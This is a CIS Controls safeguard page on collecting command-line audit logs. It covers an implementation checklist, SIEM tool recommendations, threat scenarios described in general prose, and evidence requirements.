IG2 IG3

Collect Command>Line Audit Logs

Control Group: 8. Audit Log Management

Asset Type: Devices

Security Function: Detect

Description

Collect command-line audit logs. Example implementations include collecting audit logs from PowerShell®, BASH™, and remote administrative terminals.

Implementation Checklist

1

Deploy detection tools or enable detection capabilities

2

Configure alerting thresholds and notification channels

3

Establish monitoring schedule and review process

4

Test detection capabilities with simulated events

5

Document detection procedures and escalation paths

6

Enable logging on all in-scope systems

7

Configure log forwarding to centralized SIEM

8

Define log retention periods per policy

9

Establish log review schedule and procedures

Tool Recommendations

Splunk Enterprise Security Gartner MQ Leader, SIEM 2024

SIEM platform with log management, threat detection, investigation, and compliance reporting across enterprise data sources

Cisco (Splunk) · Ingest-based or workload-based

Microsoft Sentinel Gartner MQ Leader, SIEM 2024

Cloud-native SIEM and SOAR with AI-driven analytics, automated threat response, and native Azure/M365 integration

Microsoft · Pay-as-you-go (per GB ingested)

CrowdStrike Falcon LogScale Gartner MQ Leader, EPP 2024; Forrester Wave Leader, Security Analytics 2024

High-performance log management and observability platform designed for petabyte-scale data with real-time search

CrowdStrike · Per-GB subscription

Threats & Vulnerabilities (CIS RAM)

Threat Scenarios

Living-Off-the-Land Attack Evasion

Confidentiality

Attackers use built-in OS tools like PowerShell, cmd.exe, bash, and WMI to execute malicious commands that blend with normal administrative activity, and without command-line logging these fileless attacks leave no trace for detection or forensics.

Obfuscated PowerShell Payload Execution

Integrity

Malicious PowerShell scripts using encoded commands, AMSI bypass techniques, and module loading execute on endpoints without any record of the actual commands run, preventing detection of credential harvesting, lateral movement, or data staging.

Unauthorized Remote Administration via Command Line

Confidentiality

Attackers execute commands through remote administrative tools (PsExec, SSH, WinRM) on compromised systems, and without command-line audit logs the organization cannot detect or reconstruct the attacker's activities on each compromised host.

Vulnerabilities (When Safeguard Absent)

PowerShell Script Block and Module Logging Disabled

Windows endpoints do not have PowerShell script block logging, module logging, or transcription enabled, providing no visibility into the actual PowerShell commands and scripts executed on enterprise assets.

No Process Command-Line Auditing on Endpoints

Operating systems are not configured to include command-line arguments in process creation audit events, meaning security tools cannot see what parameters were passed to executables, hiding malicious intent behind legitimate process names.

Evidence Requirements

Type	Evidence Item	Collection Frequency
Technical	Detection tool deployment evidence (dashboard screenshots, agent status)	Captured monthly
Technical	Sample alert/detection output demonstrating capability	Captured quarterly
Technical	SIEM dashboard showing log sources and collection status	Captured monthly
Record	Log review records and findings	Per review cycle
Document	Governing policy document (current, approved, communicated)	Reviewed annually

Related Policy Templates

Audit Log Management Policy

Control 8

Related Safeguards in Control 8

8.1 Establish and Maintain an Audit Log Management Process

8.2 Collect Audit Logs

8.3 Ensure Adequate Audit Log Storage

8.4 Standardize Time Synchronization

8.5 Collect Detailed Audit Logs

8.6 Collect DNS Query Audit Logs

8.7 Collect URL Request Audit Logs

8.9 Centralize Audit Logs

8.10 Retain Audit Logs

8.11 Conduct Audit Log Reviews

8.12 Collect Service Provider Logs